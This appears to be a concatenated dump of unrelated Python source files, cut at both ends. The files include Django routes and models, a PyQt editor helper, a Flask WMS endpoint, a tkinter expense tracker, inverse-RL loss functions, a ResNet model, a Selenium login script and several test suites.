print( "getTestCaseCustomFieldTestPlanDesignValue", response )
# update CustomField Value - TestSuite SpecDesign
response = myTestLink.updateTestSuiteCustomFieldDesignValue(
args['testprojectid'], args['testsuiteid'],
{'cf_ts_string' : 'A custom TestSuite value set via api'})
print( "updateTestSuiteCustomFieldDesignValue", response )
# get CustomField Value - TestSuite
response = myTestLink.getTestSuiteCustomFieldDesignValue(
'cf_ts_string', args['testprojectid'], args['testsuiteid'])
print( "getTestSuiteCustomFieldDesignValue", response )
# get CustomField Value - TestPlan
response = myTestLink.getTestPlanCustomFieldDesignValue(
'cf_tp_string', args['testprojectid'], args['testplanid'])
print( "getTestPlanCustomFieldDesignValue", response )
# get CustomField Value - Requirement Specification
response = myTestLink.getReqSpecCustomFieldDesignValue(
'cf_req_sd_string', args['testprojectid'], args['reqspecid'])
print( "getReqSpecCustomFieldDesignValue", response )
# get CustomField Value - Requirement Specification
response = myTestLink.getRequirementCustomFieldDesignValue(
'cf_req_string',args['testprojectid'], args['requirementid'])
print( "getRequirementCustomFieldDesignValue", response )
# update CustomField Value - Build
response = myTestLink.updateBuildCustomFieldsValues(
args['testprojectid'], args['testplanid'], args['buildid'],
{'cf_b_string' : 'A custom Build value set via api'})
print( "updateBuildCustomFieldsValues", response )
|
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('books', views.books, name='books'),
path('update/<int:id>', views.update, name='update'),
path('delete/<int:id>', views.delete, name='delete'),
] |
import os
import re
import subprocess
from typing import *
import pexpect
from PyQt5 import QtWidgets
from PyQt5.QtCore import QThread, QMutex
def get_temp_file(lang: str):
if lang == "rust":
return os.path.join(os.path.dirname(__file__), "temp.rs")
if lang == "python3":
return os.path.join(os.path.dirname(__file__), "temp.py")
else:
return os.path.join(os.path.dirname(__file__), "temp.cpp")
def disp_error(message: str):
error = QtWidgets.QErrorMessage()
error.showMessage(message)
error.exec_()
def racer_enable() -> bool:
try:
output = subprocess.check_output(("racer", "--version"))
if output.decode().startswith("racer"):
return True
else:
return False
except subprocess.CalledProcessError:
return False
def debug_command(lang: str) -> str:
if lang == "rust":
return "env RUST_BACKTRACE=1 rust-gdb"
if lang == "python3":
return "python3 -m pdb"
else:
return "gdb"
def compile_command(lang: str, no_debug: bool) -> List[str]:
if lang == "rust":
if no_debug:
return ["rustc"]
else:
return ["rustc", "-g"]
elif lang == "python3":
checker = os.path.join(os.path.dirname(__file__), "py_syntax_checker.py")
return ["python3", checker]
else:
if no_debug:
return [
"g++",
"-std=gnu++1y",
"-O2",
"-fsanitize=undefined",
"-I/opt/boost/gcc/include",
"-L/opt/boost/gcc/lib",
]
else:
return [
"g++",
"-std=gnu++1y",
"-fsanitize=undefined",
"-g",
"-I/opt/boost/gcc/include",
"-L/opt/boost/gcc/lib",
]
def get_compiled_file(lang: str, fname: str) -> str:
if lang == "rust":
return "./" + os.path.basename(fname.replace(".rs", ""))
elif lang == "python3":
return fname
else:
return "./a.out"
def exec_format(lang: str) -> bool:
tempfile = get_temp_file(lang)
if lang == "rust":
try:
subprocess.check_output(("rustfmt", tempfile), stderr=subprocess.STDOUT)
except Exception:
return False
elif lang == "python3":
try:
subprocess.check_output(
("autopep8", "-i", tempfile), stderr=subprocess.STDOUT
)
except Exception:
return False
else:
try:
subprocess.check_output(
("clang-format", "-i", tempfile), stderr=subprocess.STDOUT
)
except Exception:
return False
return True
def exec_command(lang: str) -> List[str]:
if lang == "rust":
return ["env", "RUST_BACKTRACE=1"]
elif lang == "python3":
return ["python3"]
else:
return []
def indent_width(lang: str) -> int:
if lang == "rust" or lang == "python3":
return 4
else:
return 2
class StateLessTextEdit(QtWidgets.QLineEdit):
def __init__(self, value: str, parent):
super().__init__()
self.parent = parent
self.setText(value)
# Need to call commit to serialize value
class StateFullTextEdit(QtWidgets.QLineEdit):
def __init__(self, settings, name: str, parent, default: Optional[str] = None):
super().__init__()
self.parent = parent
self.settings = settings
self.name = name
v = settings.value(name, type=str)
self.setText(v)
if not v and default is not None:
self.setText(default)
def commit(self):
self.settings.setValue(self.name, self.text())
class StateFullCheckBox(QtWidgets.QCheckBox):
def __init__(self, settings, name: str, parent):
super().__init__()
self.parent = parent
self.settings = settings
self.name = name
v = settings.value(name, type=bool)
self.setChecked(v)
def commit(self):
self.settings.setValue(self.name, self.isChecked())
def get_resources_dir() -> str:
return os.path.join(os.path.dirname(__file__), "resources")
def wait_input_ready(
debug_process: pexpect.spawn, lang: str, timeout: Optional[float] = None
):
if lang == "python3":
debug_process.expect("\(Pdb\)", timeout=timeout)
else:
debug_process.expect("\(gdb\)", timeout=timeout)
def get_executing_line(lang: str, line: str) -> Optional[int]:
if lang == "python3":
if line.endswith("<module>()"):
match = re.search(r"(\()(.*?)\)", line)
return int(match.groups()[-1])
else:
try:
line_num = int(line.split("\t")[0])
return line_num
except ValueError:
return None
return None
class WriteObj(object):
def __init__(self, msg: Union[bytes, str], mode: str = ""):
self.msg = msg
self.mode = mode
OJ_MUTEX = QMutex()
class Commander(QThread):
def __init__(self, console):
super().__init__()
self.console = console
self.cmd = ""
def run(self):
OJ_MUTEX.lock()
try:
out = subprocess.check_output(self.cmd, stderr=subprocess.STDOUT).decode()
self.console.writeLnSignal.emit(out)
except subprocess.CalledProcessError as err:
self.console.writeLnSignal.emit(err.output)
scroll_bar = self.console.verticalScrollBar()
scroll_bar.setValue(scroll_bar.maximum())
OJ_MUTEX.unlock()
|
"""Tests for Python requests implementation generators."""
import os
import pytest
from http_request_codegen import generate_http_request_code
from tests.combinations import (
combination_arguments_to_kwargs,
get_argument_combinations,
)
CASES_DIRS = {
method: os.path.abspath(os.path.join(os.path.dirname(__file__), method))
for method in ['GET', 'POST']
}
@pytest.mark.parametrize(
'args_group',
get_argument_combinations(method='GET', dirpath=CASES_DIRS['GET']),
ids=lambda args_group: os.path.basename(args_group['filename']),
)
def test_python_requests_get(args_group):
with open(args_group['filename']) as f:
expected_result = f.read()
result = generate_http_request_code(
'python', 'requests', 'GET',
**combination_arguments_to_kwargs(args_group['arguments']),
)
assert result == expected_result
@pytest.mark.parametrize(
'args_group',
get_argument_combinations(method='GET', dirpath=CASES_DIRS['GET']),
ids=lambda args_group: os.path.basename(args_group['filename']),
)
def test_python_requests_get__response(args_group, assert_request_args):
result = generate_http_request_code(
'python', 'requests', 'GET',
**combination_arguments_to_kwargs(args_group['arguments']),
)
if 'import requests' not in result:
result = 'import requests\n\n%s' % result
namespace = {}
exec(result, namespace)
assert_request_args(args_group['arguments'], namespace['req'].json())
@pytest.mark.parametrize(
'args_group',
get_argument_combinations(method='POST', dirpath=CASES_DIRS['POST']),
ids=lambda args_group: os.path.basename(args_group['filename']),
)
def test_python_requests_post(args_group):
with open(args_group['filename']) as f:
expected_result = f.read()
result = generate_http_request_code(
'python', 'requests', 'POST',
**combination_arguments_to_kwargs(args_group['arguments']),
)
assert result == expected_result
@pytest.mark.parametrize(
'args_group',
get_argument_combinations(method='POST', dirpath=CASES_DIRS['POST']),
ids=lambda args_group: os.path.basename(args_group['filename']),
)
def test_python_requests_post__response(
args_group, assert_request_args,
create_request_args_files,
):
result = generate_http_request_code(
'python', 'requests', 'POST',
**combination_arguments_to_kwargs(args_group['arguments']),
)
if 'import requests' not in result:
result = 'import requests\n\n%s' % result
# Create files, if needed
files = create_request_args_files(args_group)
namespace = {}
exec(result, namespace)
assert_request_args(args_group['arguments'], namespace['req'].json())
for f in files:
f.close()
os.remove(f.name)
|
"""
The Web Map Service (WMS) provides a simple HTTP interface for requesting
geo-registered map images from one or more distributed geospatial databases.
(source : https://www.ogc.org/standards/wms#schemas)
The three operations defined for a WMS are :
* GetCapabilities (to obtain service metadata) [MANDATORY],
* GetMap (to obtain the map) [MANDATORY],
* and GetFeatureInfo [OPTIONAL].
For more information about the WMS, see https://portal.ogc.org/files/?artifact_id=14416.
"""
import json
from flask import Response, abort, request
from flask_restx import Namespace, Resource
from app.common import path
from app.models.wms import utils
from app.models.wms.capabilities import get_capabilities
from app.models.wms.map import get_map_image, get_mapnik_map_for_feature_info
api = Namespace("wms", "WMS compatible endpoint")
@api.route("")
# @api.reponse(400, "Couldn't find the requested method")
class WMS(Resource):
def get(self):
normalized_args = {k.lower(): v for k, v in request.args.items()}
service = normalized_args.get("service")
if service != "WMS":
normalized_args["service"] = "WMS"
request_name = normalized_args.get("request")
if request_name == "GetMap":
return self.get_map(normalized_args)
if request_name == "GetCapabilities":
return self.get_capabilities(normalized_args)
if request_name == "GetFeatureInfo":
return self.get_feature_info(normalized_args)
return abort(
400,
"Couldn't find the requested method {}, "
"request parameter needs to be set".format(request_name),
)
def get_capabilities(self, _):
capabilities = get_capabilities()
if capabilities is None:
abort(404)
return Response(capabilities, mimetype="text/xml")
def get_map(self, normalized_args):
"""Return the map."""
image = get_map_image(normalized_args)
if image is None:
abort(404)
mapnik_format, mime_format = utils.parse_format(normalized_args)
return Response(image.tostring(mapnik_format), mimetype=mime_format)
def get_feature_info(self, normalized_args):
"""Implement the GetFeatureInfo entrypoint for the WMS endpoint"""
# TODO: fix this to output text, xml and json !
# currently, only support application/json as mimetype
if normalized_args["info_format"] != "application/json":
abort(400, "this endpoint doesn't support non json return value")
mp = get_mapnik_map_for_feature_info(normalized_args)
if mp is None:
abort(404)
mp.zoom_to_box(utils.parse_envelope(normalized_args))
raw_query_layers = normalized_args.get("query_layers", "")
query_layers = utils.parse_list(raw_query_layers)
if set(query_layers) != {layer.name for layer in mp.layers}:
abort(400, "Requested layer didnt match the query_layers parameter")
features = {"features": []}
for layerindex, mapnick_layer in enumerate(mp.layers):
mapnick_layer.queryable = True
(type, _, variable, _, _) = path.parse_unique_layer_name(mapnick_layer.name)
position = utils.parse_position(normalized_args)
layer_features = []
variable_found = None
featureset = mp.query_map_point(layerindex, position.x, position.y)
for feature in featureset:
geojson = json.loads(feature.to_geojson())
layer_features.append(geojson)
if (type == path.VECTOR) and not (variable_found):
variable_found = ("properties" in geojson) and (
f"__variable__{variable}" in geojson["properties"]
)
if (type == path.AREA) or variable_found:
features["features"].extend(layer_features)
return features
|
from tkinter import ttk, Text, Label, Entry, StringVar
import tkinter as tk
from tkinter.constants import BOTTOM, TOP
from .db import database # Import Database class
import re
import inspect
databaseConnector = database() # Database object
def monthView(root):
monthWindow = tk.Toplevel(root, width=900, height=500)
monthWindow.title("Expenses Calendar for {}".format(databaseConnector.currentDate))
# Setup the output Tree
tree = ttk.Treeview(monthWindow, column=("c1", "c2", "c3", "c4", "c5", "c6", "c7"), show='headings')
tree.column("#1", anchor=tk.CENTER)
tree.heading("#1", text="Date")
tree.column("#2", anchor=tk.CENTER)
tree.heading("#2", text="Incomes")
tree.column("#3", anchor=tk.CENTER)
tree.heading("#3", text="Expenses")
tree.column("#4", anchor=tk.CENTER)
tree.heading("#4", text="Added to Piggy")
tree.column("#5", anchor=tk.CENTER)
tree.heading("#5", text="Got from Piggy")
tree.column("#6", anchor=tk.CENTER)
tree.heading("#6", text="Owed Money")
tree.column("#7", anchor=tk.CENTER)
tree.heading("#7", text="Comments")
tree.pack(fill="x")
monthLabel=StringVar()
monthLabel.set("Search records from other months ")
labelDir=Label(monthWindow, textvariable=monthLabel, height=4)
labelDir.pack(side="left")
directory=StringVar(None)
dirname=Entry(monthWindow,textvariable=directory,width=50)
dirname.pack(side="left")
#otherMonthView(monthWindow, tree, True, "") # Run first time for current month
monthBtn = tk.Button(
monthWindow, #obj
command=lambda:otherMonthView(monthWindow, tree, False, directory.get()), # function
textvariable= "", font="Calibri",text= "Search" , bg= "#3EA055", fg="white", height=1, width= 15 #style
)
monthBtn.pack(pady=15)
# Each function now calls popUpManager that will check which function called it and manage the values
def addMoney(root):
try:
popUpManager(root, "Added a new Income", "Insert amount")
except:
error(root, "You have to provide a number to the amount you want to add!!")
def addCost(root):
try:
popUpManager(root, "Add a new expense", "Add expense amount")
except:
error(root, "You have to provide a number to the amount you want to add!!")
def add2Piggy(root):
try:
popUpManager(root, "Add money to your Piggy bank", "Insert amount")
except:
error(root, "You have to provide a number to the amount you want to add to your Piggy bank!!")
def getPiggy(root):
try:
popUpManager(root, "Get money from your Piggy bank", "Insert amount")
except:
error(root, "You have to provide a number to the amount you want to get to your Piggy bank!!")
def oweMoney(root):
try:
popUpManager(root, "Add a new dept", "Insert amount")
except:
error(root, "You have to provide a number to the amount that you have to pay back!!")
def otherMonthView(root, tree, initFLG, usrInput = ""):
# Check if the user provided a string, if so give to the parser to check it
parsedMonth = ""
if usrInput != "":
parsedMonth = dateParse(usrInput)
if parsedMonth == "" and not initFLG:
error(root,"Something went wrong...\nPlease check your format and try again...\nExample: For may of 2021 type 'may 2021' !!")
else:
MonthInfo = databaseConnector.getFromDB(parsedMonth,"")
for date in MonthInfo:
tree.insert("", tk.END, values=date)
return parsedMonth
def dateParse(provided):
months = ["jan", "feb", "mar", "apr", "may", "jun", "jul", "aug", "sep", "oct", "nov", "dec"]
try:
if provided.find(" "):
provided = provided.split(" ")
# Check Year
match = re.match(r'.*([1-3][0-9]{3})', provided[1]) # Check if second part of the string is a year
if match is None:
print(1/0) # Force to go to exception block
# Check Month
provided[0] = provided[0].lower()
correctMonth = False # Flag to check at the end of the for loop if the parser found a month
for month in months:
if month in provided[0]:
provided[0] = month
correctMonth = True
break
if not correctMonth:
print(1/0)
return str(provided[0]+provided[1])
else:
print(1/0)
except:
return("")
def add2DB(root, income: float, outcome: float, toPiggy: float, fromPiggy: float, oweMoney: float, note: str):
try:
# Is used by every button that adds to the database
income = databaseConnector.addToDatabase(
income, #Income
outcome, # Outcome
toPiggy, # Piggy In/out
fromPiggy, # Owed Money
oweMoney, # Note
note
)
monthView(root)
except:
error(root,"Something went wront!\nPlease try again..")
def popUpManager(root, titleVal,labelVal):
popUp = tk.Toplevel(root)
popUp.title(titleVal)
label=StringVar()
label.set(labelVal)
costLabelSet = Label(popUp, textvariable=label, height=4)
costLabelSet.pack(side="left")
userInput=StringVar(None)
userInput.set(0)
costValSet = Entry(popUp,textvariable=userInput,width=25)
costValSet.pack(side="left")
noteLabel=StringVar()
noteLabel.set("Add Comment")
noteLabelSet = Label(popUp, textvariable=noteLabel, height=4)
noteLabelSet.pack(side="left")
noteText=StringVar(None)
noteTextSet = Entry(popUp,textvariable=noteText,width=50)
noteTextSet.pack(side="left")
# init values
## will only change one of these depending on what transaction the user wants
income = 0.0
outcome = 0.0
toPiggy = 0.0
fromPiggy = 0.0
oweMoney = 0.0
# Now we will get the name of the caller function with the 3 lines here
# This will store the name of the function to callerFunction
# which we check with a simple if elif to see which one it was
# and after that store the amount the user gave to the according variable
curframe = inspect.currentframe()
calframe = inspect.getouterframes(curframe, 2)
callerFunction = str(calframe[1][3])
addButton= tk.Button(
popUp, #obj
# We now call a function providing all the DB values as well as the string value of the caller function
# This is because we now need a new check on the Text widget to occur AFTER the button is pressed and check if it's a float
# if we just pass the data directly to the DB it has NOT updated the value from the text widget, we need a way to re-gain that !!
command=lambda:addButtonCall(root, callerFunction, str(userInput.get()),income, outcome, toPiggy, fromPiggy, oweMoney, str(noteText.get())), # function
textvariable= "", font="Calibri",text= "Add Amount" , bg= "#3EA055", fg="white", height=1, width= 15 #style
)
addButton.pack(pady= 25,padx= 15)
def addButtonCall(root, callerFunction, userInput, income, outcome, toPiggy, fromPiggy, oweMoney, note):
# this function is only called from the popUpManager
# the purpose is once the button is pressed to make it check the Text widgets value and send it to the DB after it checks it
userInput = float(userInput) # Convert user input to float
if isinstance(userInput, float):
if callerFunction == "addMoney":
income = userInput
elif callerFunction == "addCost":
outcome = userInput
elif callerFunction == "add2Piggy":
toPiggy = userInput
elif callerFunction == "getPiggy":
fromPiggy = userInput
elif callerFunction == "oweMoney":
oweMoney = userInput
valueList = [income, outcome, toPiggy, fromPiggy, oweMoney]
if not all(isinstance(x, float) for x in valueList):
error(root, "You have to provide a number to the amount you want to add!!")
print(1/0)
else:
add2DB(root, income, outcome, toPiggy, fromPiggy, oweMoney, note)
def error(root, text):
errorWindow = tk.Toplevel(root, width=300, height=300)
errorWindow.title("Error")
header = tk.Label(errorWindow, text = text).pack()
exit_button = tk.Button(errorWindow, text="Exit", command=errorWindow.destroy)
exit_button.pack(pady=20) |
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class EventItem(scrapy.Item):
# Structure
id = scrapy.Field()
# What
name = scrapy.Field()
url = scrapy.Field()
imgList = scrapy.Field()
imgDetail = scrapy.Field()
# When
dateStart = scrapy.Field()
dateEnd = scrapy.Field()
# Where
country = scrapy.Field()
city = scrapy.Field()
locality = scrapy.Field()
address = scrapy.Field()
coordinate = scrapy.Field()
place = scrapy.Field()
zone = scrapy.Field()
# Spider
spiderName = scrapy.Field()
spiderSource = scrapy.Field()
# Extra
extras = scrapy.Field()
|
import numpy as np
import torch
import torch.nn.functional as F
def f_div_loss(div: str, IS: bool, samples, rho_expert, agent_density, reward_func, device):
# please add eps to expert density, not here
assert div in ['fkl', 'rkl', 'js']
s, _, log_a = samples
N, T, d = s.shape
s_vec = s.reshape(-1, d)
log_density_ratio = np.log(rho_expert(s_vec)) - agent_density.score_samples(s_vec).reshape(-1)
log_density_ratio = torch.FloatTensor(log_density_ratio).to(device)
if div == 'fkl':
t1 = torch.exp(log_density_ratio) # (N*T,) p/q TODO: clip
elif div == 'rkl':
t1 = log_density_ratio # (N*T,) log (p/q)
elif div == 'js':
t1 = F.softplus(log_density_ratio) # (N*T,) log (1 + p/q)
t1 = (-t1).view(N, T).sum(1) # NOTE: sign (N,)
t2 = reward_func.r(torch.FloatTensor(s_vec).to(device)).view(N, T).sum(1) # (N,)
if IS:
traj_reward = reward_func.get_scalar_reward(s_vec).reshape(N, T).sum(1) # (N,)
traj_log_prob = log_a.sum(1) # (N,)
IS_ratio = F.softmax(torch.FloatTensor(traj_reward - traj_log_prob), dim=0).to(device) # normalized weight
surrogate_objective = (IS_ratio * t1 * t2).sum() - (IS_ratio * t1).sum() * (IS_ratio * t2).sum()
else:
surrogate_objective = (t1 * t2).mean() - t1.mean() * t2.mean() # sample covariance
surrogate_objective /= T
return surrogate_objective, t1 / T # log of geometric mean w.r.t. traj (0 is the borderline)
def maxentirl_loss(div: str, agent_samples, expert_samples, reward_func, device):
''' NOTE: only for maxentirl (FKL in trajectory): E_p[r(tau)] - E_q[r(tau)] w.r.t. r
agent_samples is numpy array of shape (N, T, d)
expert_samples is numpy array of shape (N, T, d) or (N, d)
'''
assert div in ['maxentirl']
sA, _, _ = agent_samples
_, T, d = sA.shape
sA_vec = torch.FloatTensor(sA).reshape(-1, d).to(device)
sE_vec = torch.FloatTensor(expert_samples).reshape(-1, d).to(device)
t1 = reward_func.r(sA_vec).view(-1) # E_q[r(tau)]
t2 = reward_func.r(sE_vec).view(-1) # E_p[r(tau)]
surrogate_objective = t1.mean() - t2.mean() # gradient ascent
return T * surrogate_objective # same scale
def f_div_current_state_loss(div: str, samples, rho_expert, agent_density, reward_func, device):
''' NOTE: deprecated
div=fkl-state is exactly maxentirl with importance sampling
div=rkl-state,js-state are approximate SMM-IRL (no theory support)
'''
assert div in ['maxentirl', 'fkl-state', 'rkl-state', 'js-state']
s, _, _ = samples
N, T, d = s.shape
s_vec = s.reshape(-1, d)
log_density_ratio = np.log(rho_expert(s_vec)) - agent_density.score_samples(s_vec).reshape(-1)
log_density_ratio = torch.FloatTensor(log_density_ratio).to(device)
if div in ['maxentirl', 'fkl-state']:
t1 = torch.exp(log_density_ratio) # (N*T,) p/q TODO: clip
elif div == 'rkl-state':
t1 = log_density_ratio # (N*T,) log (p/q)
elif div == 'js-state':
t1 = F.softplus(log_density_ratio) # (N*T,) log (1 + p/q)
t1 = -t1 # NOTE: sign (N*T,)
t2 = reward_func.r(torch.FloatTensor(s_vec).to(device)).view(-1) # (N*T,) not sum
surrogate_objective = (t1 * t2).mean() - t1.mean() * t2.mean()
return T * surrogate_objective # same scale
|
import argparse
import Functions_Features.functionsToDetermineMotifStrength as fdm
import pandas as pd
parser = argparse.ArgumentParser()
parser.add_argument("-w","--tmpfolder",type=str,help="Input the upperlevel folder containing folder to Write to")
parser.add_argument("-t","--foldertitle",type=str,help="Input the title of the mutation file")
parser.add_argument("-m","--mutationfile",type=str,help="Input a mutation file")
parser.add_argument("-q","--quantile",nargs='?',default=0.95,type=float,help="Input a quantile value to set a threshold strength score for each motif cluster, default is 0.95")
args = parser.parse_args()
TMPfolder=args.tmpfolder
folderTitle=args.foldertitle
MUTATION_FILE=args.mutationfile
QUANTILE=args.quantile
dict_NumCluster={"ESE":8,"ESS":7,"ISE":7,"ISS":8}
strength_threshold_dict=fdm.createSREclusterThresholdDictionary(TMPfolder,dict_NumCluster,QUANTILE)
with open(MUTATION_FILE) as f:
#with open("../data/MAPT_MUTs_ToTest.tsv") as f:
mutations=[line.strip().split("\t") for line in f]
#mutsToIgnore=["Mut3","Mut10","Mut33"]
to_write = []
# Go through each mutation
for mut in mutations:
mutID=mut[0]
ESE_motifStrengths = fdm.getSumOfMotifScoreDiffsPerSRECluster(TMPfolder,folderTitle,mutID,"ESE",dict_NumCluster["ESE"],strength_threshold_dict)
ESS_motifStrengths = fdm.getSumOfMotifScoreDiffsPerSRECluster(TMPfolder,folderTitle,mutID,"ESS",dict_NumCluster["ESS"],strength_threshold_dict)
ISE_motifStrengths = fdm.getSumOfMotifScoreDiffsPerSRECluster(TMPfolder,folderTitle,mutID,"ISE",dict_NumCluster["ISE"],strength_threshold_dict)
ISS_motifStrengths = fdm.getSumOfMotifScoreDiffsPerSRECluster(TMPfolder,folderTitle,mutID,"ISS",dict_NumCluster["ISS"],strength_threshold_dict)
motifStrengths_forMut = [mutID]+ESE_motifStrengths+ESS_motifStrengths+ISE_motifStrengths+ISS_motifStrengths
to_write.append(motifStrengths_forMut)
with open(TMPfolder+MUTATION_FILE.split("/")[2].split(".")[0]+"_SREstrengthsDifferences_perCluster.tsv","w") as fw:
#with open(TMPfolder+motifType+"_MUTsToTest_ScoreDifferences.tsv","w") as fw:
fw.write("MutID")
for motifType in ["ESE","ESS","ISE","ISS"]:
for cluster in range(1,dict_NumCluster[motifType]+1):
fw.write("\t")
fw.write(motifType+"_Cluster"+str(cluster))
fw.write("\n")
for i in to_write:
fw.write("\t".join(i))
fw.write("\n") |
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
chromedriver = "/home/yongjer/下載/chromedriver"
option = webdriver.ChromeOptions()
option.binary_location = '/opt/brave.com/brave/brave'
s = Service(chromedriver)
driver = webdriver.Chrome(service=s, options=option)
driver.get("https://cu.nsysu.edu.tw/mooc/login.php")
id = driver.find_element(By.ID,"s_username")
id.send_keys("YourId")
passward = driver.find_element(By.NAME,"password")
passward.send_keys("YourPassword")
send = driver.find_element(By.ID,"btnSignIn")
send.click() |
import torch
import torch.nn as nn
import torch.nn.functional as F
from einops.layers.torch import Rearrange
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_channels, out_channels, stride = 1):
super(BasicBlock, self).__init__()
resblock_out_channels = out_channels * BasicBlock.expansion
self.residual = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size = 3, stride = stride, padding = 1, bias = False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace = True),
nn.Conv2d(out_channels, resblock_out_channels, kernel_size = 3, padding = 1, bias = False),
nn.BatchNorm2d(resblock_out_channels)
)
if stride == 1 and in_channels == resblock_out_channels:
self.shortcut = nn.Identity()
else:
self.shortcut = nn.Sequential(
nn.Conv2d(in_channels, resblock_out_channels, kernel_size = 1, stride = stride, bias = False),
nn.BatchNorm2d(resblock_out_channels),
)
self.final = nn.ReLU(inplace = True)
def forward(self, x):
return self.final(self.residual(x) + self.shortcut(x))
class BottleNeck(nn.Module):
expansion = 4
def __init__(self, in_channels, out_channels, stride = 1):
super().__init__()
resblock_out_channels = out_channels * BottleNeck.expansion
self.residual = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size = 1, bias = False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace = True),
nn.Conv2d(out_channels, out_channels, stride = stride, kernel_size = 3, padding = 1, bias = False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace = True),
nn.Conv2d(out_channels, resblock_out_channels, kernel_size = 3, padding = 1, bias = False),
nn.BatchNorm2d(resblock_out_channels)
)
if stride == 1 and in_channels == resblock_out_channels:
self.shortcut = nn.Identity()
else:
self.shortcut = nn.Sequential(
nn.Conv2d(in_channels, resblock_out_channels, kernel_size = 1, stride = stride, bias = False),
nn.BatchNorm2d(resblock_out_channels),
)
self.final = nn.ReLU(inplace = True)
def forward(self, x):
return self.final(self.residual(x) + self.shortcut(x))
class ResNet(nn.Module):
def __init__(self, block_type, num_block, num_classes, **kwargs):
super(ResNet, self).__init__()
if block_type not in ['BasicBlock', 'BottleNeck']:
raise NotImplementedError('Invalid block type.')
block = BasicBlock if block_type == 'BasicBlock' else BottleNeck
self.num_classes = num_classes
self.layer1 = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=3, stride = 1, padding=1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True)
)
self.cur_channels = 64
self.layer2 = self._make_layer(block, 64, num_block[0], 1)
self.layer3 = self._make_layer(block, 128, num_block[1], 2)
self.layer4 = self._make_layer(block, 256, num_block[2], 2)
self.layer5 = self._make_layer(block, 512, num_block[3], 2)
self.final = nn.Sequential(
nn.AdaptiveAvgPool2d((1, 1)),
Rearrange('b c h w -> b (c h w)'),
nn.Linear(512 * block.expansion, num_classes)
)
def _make_layer(self, block, out_channels, num_blocks, stride):
layers = []
for i in range(num_blocks):
cur_stride = stride if i == 0 else 1
layers.append(block(self.cur_channels, out_channels, cur_stride))
self.cur_channels = out_channels * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.layer5(x)
return self.final(x)
def loss(self, res, gt):
return F.cross_entropy(res, gt)
def resnet18(**kwargs):
return ResNet('BasicBlock', [2, 2, 2, 2], **kwargs)
def resnet34(**kwargs):
return ResNet('BasicBlock', [3, 4, 6, 3], **kwargs)
def resnet50(**kwargs):
return ResNet('BottleNeck', [3, 4, 6, 3], **kwargs)
def resnet101(**kwargs):
return ResNet('BottleNeck', [3, 4, 23, 3], **kwargs)
def resnet152(**kwargs):
return ResNet('BottleNeck', [3, 8, 36, 3], **kwargs)
def resnet(**kwargs):
return ResNet(**kwargs) |
from django.db import models
# Create your models here.
class Menu(models.Model):
title = models.CharField(max_length=32)
weight = models.IntegerField(default=1)
icon = models.CharField(max_length=64)
def __str__(self):
return self.title
class Permission(models.Model):
url = models.CharField(max_length=64, verbose_name='权限')
title = models.CharField(max_length=32, verbose_name='标题')
name = models.CharField(max_length=32, verbose_name='URL别名', unique=True)
menu = models.ForeignKey(Menu, blank=True, null=True)
parent = models.ForeignKey('Permission', blank=True, null=True)
def __str__(self):
return self.title
class Role(models.Model):
name = models.CharField(max_length=64, verbose_name='名称')
permissions = models.ManyToManyField('Permission',verbose_name='角色所拥有的权限',blank=True)
def __str__(self):
return self.name
class RbacUser(models.Model):
"""
用户表
"""
# username = models.CharField(max_length=32, verbose_name='用户名')
# password = models.CharField(max_length=32, verbose_name='密码')
roles = models.ManyToManyField(Role, verbose_name='用户所拥有的角色', blank=True)
class Meta:
abstract = True # 数据库迁移的时候不生成表 作为基类 继承使用 |
from fluiddb.cache.permission import CachingPermissionAPI
from fluiddb.cache.test.test_namespace import CachingNamespaceAPITestMixin
from fluiddb.data.permission import Operation, Policy
from fluiddb.data.system import createSystemData
from fluiddb.model.exceptions import UnknownPathError
from fluiddb.model.test.test_namespace import NamespaceAPITestMixin
from fluiddb.model.user import UserAPI, getUser
from fluiddb.security.exceptions import PermissionDeniedError
from fluiddb.security.namespace import SecureNamespaceAPI
from fluiddb.testing.basic import FluidinfoTestCase
from fluiddb.testing.resources import (
BrokenCacheResource, CacheResource, ConfigResource, DatabaseResource,
LoggingResource)
class SecureNamespaceAPITestMixin(object):
def testCreateWithUnknownParent(self):
"""
L{SecureNamespaceAPI.create} raises an L{UnknownPathError} exception if
an attempt to create a L{Namespace} with an unknown parent is made.
"""
values = [(u'unknown/namespace', u'An unknown namespace.')]
error = self.assertRaises(UnknownPathError,
self.namespaces.create, values)
self.assertEqual([u'unknown'], error.paths)
def testDeleteWithUnknownPath(self):
"""
L{SecureNamespaceAPI.delete} raises an L{UnknownPathError} if a path
for an unknown L{Namespace} is specified.
"""
error = self.assertRaises(UnknownPathError,
self.namespaces.delete,
[u'unknown/namespace'])
self.assertEqual([u'unknown/namespace'], error.paths)
def testSetWithUnknownPath(self):
"""
L{SecureNamespaceAPI.set} raises an L{UnknownPathError} if a path for
an unknown L{Namespace} is specified.
"""
values = {u'unknown/namespace': u'An unknown namespace.'}
error = self.assertRaises(UnknownPathError,
self.namespaces.set, values)
self.assertEqual([u'unknown/namespace'], error.paths)
class SecureNamespaceAPITest(NamespaceAPITestMixin,
CachingNamespaceAPITestMixin,
SecureNamespaceAPITestMixin,
FluidinfoTestCase):
resources = [('cache', CacheResource()),
('config', ConfigResource()),
('store', DatabaseResource())]
def setUp(self):
super(SecureNamespaceAPITest, self).setUp()
self.system = createSystemData()
UserAPI().create([(u'username', u'password', u'User',
u'user@example.com')])
self.user = getUser(u'username')
self.namespaces = SecureNamespaceAPI(self.user)
self.permissions = CachingPermissionAPI(self.user)
class SecureNamespaceAPIWithBrokenCacheTest(NamespaceAPITestMixin,
SecureNamespaceAPITestMixin,
FluidinfoTestCase):
resources = [('cache', BrokenCacheResource()),
('config', ConfigResource()),
('log', LoggingResource()),
